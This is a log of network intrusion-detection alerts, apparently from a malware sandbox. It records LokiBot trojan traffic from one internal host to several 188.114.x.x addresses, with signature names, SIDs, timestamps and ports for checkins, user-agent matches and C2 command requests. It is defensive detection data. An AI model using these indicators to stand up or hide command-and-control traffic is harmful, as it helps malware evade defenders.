ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:08.863871
SID:	2021641
Source Port:	49251
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:57.792134
SID:	2025381
Source Port:	49239
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:37.677256
SID:	2024313
Source Port:	49217
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:19:13.398917
SID:	2024313
Source Port:	49256
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:35.132025
SID:	2021641
Source Port:	49164
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:39.511374
SID:	2024318
Source Port:	49167
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:30.098368
SID:	2024318
Source Port:	49214
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:43.784658
SID:	2825766
Source Port:	49224
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:00.429820
SID:	2021641
Source Port:	49242
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:42.915752
SID:	2024318
Source Port:	49223
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:30.098368
SID:	2024313
Source Port:	49214
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:42.915752
SID:	2024313
Source Port:	49223
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:19.988815
SID:	2025381
Source Port:	49203
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:44.730541
SID:	2825766
Source Port:	49225
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:54.073092
SID:	2021641
Source Port:	49181
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:16.270962
SID:	2025381
Source Port:	49199
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:52.694696
SID:	2025381
Source Port:	49180
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:56.093323
SID:	2024313
Source Port:	49237
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:56.984952
SID:	2021641
Source Port:	49183
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:42.120355
SID:	2021641
Source Port:	49169
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:56.093323
SID:	2024318
Source Port:	49237
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:19:02.183841
SID:	2825766
Source Port:	49244
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:09.860809
SID:	2825766
Source Port:	49196
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:44.730541
SID:	2021641
Source Port:	49225
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:37.677256
SID:	2024318
Source Port:	49217
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:50.061779
SID:	2025381
Source Port:	49231
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:07.989686
SID:	2021641
Source Port:	49194
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:28.376454
SID:	2021641
Source Port:	49212
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:43.784658
SID:	2024313
Source Port:	49224
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:49.167216
SID:	2825766
Source Port:	49230
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:00.429820
SID:	2825766
Source Port:	49242
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:10.679781
SID:	2024318
Source Port:	49197
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:08.948107
SID:	2025381
Source Port:	49195
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:29.294238
SID:	2024318
Source Port:	49213
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:29.294238
SID:	2024313
Source Port:	49213
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:41.210686
SID:	2021641
Source Port:	49221
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:10.679781
SID:	2024313
Source Port:	49197
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:43.784658
SID:	2024318
Source Port:	49224
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:38.077506
SID:	2024318
Source Port:	49166
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:39.511374
SID:	2825766
Source Port:	49167
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:56.984952
SID:	2825766
Source Port:	49183
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:58.820260
SID:	2021641
Source Port:	49185
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:17.653379
SID:	2825766
Source Port:	49261
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:45.155201
SID:	2825766
Source Port:	49172
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:38.077506
SID:	2024313
Source Port:	49166
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:21.836224
SID:	2825766
Source Port:	49205
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:57.920775
SID:	2024313
Source Port:	49184
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:12.597934
SID:	2825766
Source Port:	49255
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:27.512891
SID:	2024313
Source Port:	49211
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:45.155201
SID:	2021641
Source Port:	49172
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:57.920775
SID:	2024318
Source Port:	49184
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:58.594043
SID:	2021641
Source Port:	49240
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:06.045591
SID:	2021641
Source Port:	49192
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:27.512891
SID:	2024318
Source Port:	49211
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:54.312724
SID:	2025381
Source Port:	49235
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:45.625277
SID:	2024313
Source Port:	49226
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:47.441038
SID:	2025381
Source Port:	49228
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:19:11.675767
SID:	2025381
Source Port:	49254
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:25.484710
SID:	2021641
Source Port:	49209
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:12.597934
SID:	2021641
Source Port:	49255
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:19:10.741295
SID:	2825766
Source Port:	49253
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:46.517579
SID:	2024318
Source Port:	49227
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:45.625277
SID:	2024318
Source Port:	49226
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:58.820260
SID:	2825766
Source Port:	49185
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.9

Timestamp:	05/23/24-20:19:05.135747
SID:	2024313
Source Port:	49247
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:46.517579
SID:	2024313
Source Port:	49227
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:04.176231
SID:	2825766
Source Port:	49191
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.9

Timestamp:	05/23/24-20:19:05.135747
SID:	2024318
Source Port:	49247
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:19:10.741295
SID:	2024318
Source Port:	49253
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:19:02.183841
SID:	2024313
Source Port:	49244
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:39.511374
SID:	2021641
Source Port:	49167
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:24.566045
SID:	2021641
Source Port:	49208
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:19:02.183841
SID:	2024318
Source Port:	49244
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:01.377448
SID:	2025381
Source Port:	49243
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:14.278026
SID:	2024313
Source Port:	49257
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:19:10.741295
SID:	2024313
Source Port:	49253
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:17.653379
SID:	2025381
Source Port:	49261
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:23.674890
SID:	2825766
Source Port:	49207
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:39.381191
SID:	2021641
Source Port:	49219
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:14.278026
SID:	2024318
Source Port:	49257
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:50.944456
SID:	2025381
Source Port:	49178
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:00.429820
SID:	2024313
Source Port:	49242
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:17.156368
SID:	2025381
Source Port:	49200
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:41.981231
SID:	2825766
Source Port:	49222
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:54.312724
SID:	2024313
Source Port:	49235
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:18.976087
SID:	2025381
Source Port:	49202
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:46.517579
SID:	2825766
Source Port:	49227
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:01.377448
SID:	2825766
Source Port:	49243
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:27.512891
SID:	2025381
Source Port:	49211
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:54.312724
SID:	2024318
Source Port:	49235
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:00.429820
SID:	2024318
Source Port:	49242
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:38.077506
SID:	2025381
Source Port:	49166
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:19:11.675767
SID:	2024318
Source Port:	49254
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:58.594043
SID:	2025381
Source Port:	49240
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:15.184596
SID:	2825766
Source Port:	49258
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:22.772748
SID:	2024318
Source Port:	49206
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:11.714251
SID:	2825766
Source Port:	49198
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:42.120355
SID:	2024318
Source Port:	49169
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:37.677256
SID:	2825766
Source Port:	49217
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:42.120355
SID:	2024313
Source Port:	49169
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:41.210686
SID:	2025381
Source Port:	49221
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:41.981231
SID:	2025381
Source Port:	49222
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:44.730541
SID:	2024313
Source Port:	49225
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:01.557933
SID:	2025381
Source Port:	49188
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:09.943896
SID:	2024318
Source Port:	49252
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:44.730541
SID:	2024318
Source Port:	49225
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:55.233506
SID:	2024318
Source Port:	49236
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:19:11.675767
SID:	2024313
Source Port:	49254
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:55.233506
SID:	2024313
Source Port:	49236
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:09.943896
SID:	2024313
Source Port:	49252
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:10.679781
SID:	2021641
Source Port:	49197
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:07.107766
SID:	2021641
Source Port:	49193
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:30.957362
SID:	2024318
Source Port:	49215
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:21.836224
SID:	2025381
Source Port:	49205
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:30.957362
SID:	2024313
Source Port:	49215
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

